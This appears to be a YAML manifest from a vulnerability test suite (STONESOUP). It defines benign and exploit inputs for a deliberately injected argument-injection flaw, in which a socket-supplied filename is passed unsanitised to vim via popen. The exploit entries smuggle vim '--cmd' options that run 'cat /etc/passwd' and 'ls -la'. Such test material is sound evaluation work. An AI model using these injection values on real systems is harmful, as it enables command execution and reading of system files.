io_pair:
  description: "This weakness takes a filename from an untrusted source and uses a subprocess (via popen) to perform a search and replace of the text \"hello\" with \"Hello\".  The untrusted input is not properly sanitized, and may be used to perform an argument injection on the base command in order to run additional commands or functions.\n"
  base_inputs:
    - source: socket_input
      source_enum: 5
      stage: co_process
      stage_enum: 1
      id: source
      ordinal: 1
      address: ss-localhost
      port: 8887
  benigns:
    - inputs:
        - ordinal: 1
          source_enum: 5
          stage: co_process
          id: source
          source: socket_input
          stage_enum: 1
          value: /opt/stonesoup/workspace/testData/vim_inputs/sample1.txt
          value_type_enum: 0
          address: ss-localhost
          port: 8887
          value_type: USE_TEXT_DIRECTLY
          value_encoding: none
        - stage: pre_process
          value_type_enum: 0
          name: !<!> $SS_TC_ROOT/testData/vim_scripts/hello.vim
          ordinal: 1
          source_enum: 3
          source: file_content_input
          value_type: USE_TEXT_DIRECTLY
          stage_enum: 0
          value: !<!> ":silent %s/hello/Hello/g\n:wq\n"
          value_encoding: none
        - source: file_content_input
          stage: pre_process
          value_encoding: none
          ordinal: 2
          source_enum: 3
          name: !<!> $SS_TC_ROOT/testData/vim_inputs/sample1.txt
          value: !<!> hello World!
          value_type_enum: 0
          value_type: USE_TEXT_DIRECTLY
          stage_enum: 0
    - inputs:
        - source_enum: 5
          stage: co_process
          port: 8887
          value_type_enum: 0
          ordinal: 1
          source: socket_input
          value: /opt/stonesoup/workspace/testData/vim_inputs/sample2.txt
          address: ss-localhost
          value_encoding: none
          id: source
          value_type: USE_TEXT_DIRECTLY
          stage_enum: 1
        - stage: pre_process
          ordinal: 1
          value_type_enum: 0
          name: !<!> $SS_TC_ROOT/testData/vim_scripts/hello.vim
          value_type: USE_TEXT_DIRECTLY
          value: !<!> ":silent %s/hello/Hello/g\n:wq\n"
          stage_enum: 0
          source_enum: 3
          value_encoding: none
          source: file_content_input
        - source_enum: 3
          source: file_content_input
          value: !<!> "hello?\nhello.\nhello!\nhello..."
          ordinal: 2
          stage: pre_process
          value_encoding: none
          stage_enum: 0
          name: !<!> $SS_TC_ROOT/testData/vim_inputs/sample2.txt
          value_type: USE_TEXT_DIRECTLY
          value_type_enum: 0
    - inputs:
        - source_enum: 5
          value_encoding: none
          id: source
          stage_enum: 1
          port: 8887
          stage: co_process
          source: socket_input
          address: ss-localhost
          ordinal: 1
          value: /opt/stonesoup/workspace/testData/vim_inputs/sample3.txt
          value_type_enum: 0
          value_type: USE_TEXT_DIRECTLY
        - value_type_enum: 0
          stage: pre_process
          source_enum: 3
          stage_enum: 0
          value: !<!> ":silent %s/hello/Hello/g\n:wq\n"
          ordinal: 1
          value_type: USE_TEXT_DIRECTLY
          value_encoding: none
          source: file_content_input
          name: !<!> $SS_TC_ROOT/testData/vim_scripts/hello.vim
        - ordinal: 2
          source_enum: 3
          stage: pre_process
          stage_enum: 0
          value_encoding: none
          source: file_content_input
          value: !<!> "Hello again, hello.  Just called to say hello.\n\nYou had me at \"hello\".\n\n"
          name: !<!> $SS_TC_ROOT/testData/vim_inputs/sample3.txt
          value_type: USE_TEXT_DIRECTLY
          value_type_enum: 0
  exploits:
    - inputs:
        - stage_enum: 1
          value_type: USE_TEXT_DIRECTLY
          value_type_enum: 0
          source: socket_input
          source_enum: 5
          value_encoding: none
          stage: co_process
          id: source
          ordinal: 1
          address: ss-localhost
          port: 8887
          value: --cmd 'silent !cat /etc/passwd' /opt/stonesoup/workspace/testData/vim_inputs/sample1.txt
        - source_enum: 3
          value_type_enum: 0
          ordinal: 1
          stage_enum: 0
          name: !<!> $SS_TC_ROOT/testData/vim_scripts/hello.vim
          source: file_content_input
          value_encoding: none
          stage: pre_process
          value_type: USE_TEXT_DIRECTLY
          value: !<!> ":silent %s/hello/Hello/g\n:wq\n"
        - value_type: USE_TEXT_DIRECTLY
          value_type_enum: 0
          source_enum: 3
          stage: pre_process
          value_encoding: none
          value: !<!> hello World!
          source: file_content_input
          ordinal: 2
          stage_enum: 0
          name: !<!> $SS_TC_ROOT/testData/vim_inputs/sample1.txt
    - inputs:
        - source: socket_input
          value: --cmd 'silent !ls -la .' /opt/stonesoup/workspace/testData/vim_inputs/sample2.txt
          port: 8887
          stage_enum: 1
          source_enum: 5
          value_encoding: none
          value_type: USE_TEXT_DIRECTLY
          id: source
          stage: co_process
          ordinal: 1
          address: ss-localhost
          value_type_enum: 0
        - stage: pre_process
          value: !<!> ":silent %s/hello/Hello/g\n:wq\n"
          stage_enum: 0
          ordinal: 1
          name: !<!> $SS_TC_ROOT/testData/vim_scripts/hello.vim
          value_encoding: none
          value_type: USE_TEXT_DIRECTLY
          value_type_enum: 0
          source_enum: 3
          source: file_content_input
        - ordinal: 2
          value_type: USE_TEXT_DIRECTLY
          value: !<!> "hello?\nhello.\nhello!\nhello..."
          stage_enum: 0
          name: !<!> $SS_TC_ROOT/testData/vim_inputs/sample2.txt
          value_encoding: none
          source: file_content_input
          value_type_enum: 0
          stage: pre_process
          source_enum: 3
description: "Creating test case using base program.\nAdded a Socket Server to accept communication from untrusted source.\nCompleted injection.\n"
code_complexity_features:
  - file_name: /tmp/tmpxAjPLq_ss_testcase/src-rose/src/dfa.c
    function_name: stonesoup_handle_taint
    line_number: 0
    feature_group: source_taint
    feature: SOCKET
  - file_name: /tmp/tmpxAjPLq_ss_testcase/src-rose/src/dfa.c
    function_name: stonesoup_handle_taint
    line_number: 0
    feature_group: data_type
    feature: simple
  - file_name: /tmp/tmpxAjPLq_ss_testcase/src-rose/src/dfa.c
    function_name: stonesoup_handle_taint
    line_number: 0
    feature_group: data_flow
    feature: basic
  - file_name: /tmp/tmpxAjPLq_ss_testcase/src-rose/src/dfa.c
    function_name: stonesoup_handle_taint
    line_number: 0
    feature_group: control_flow
    feature: sequence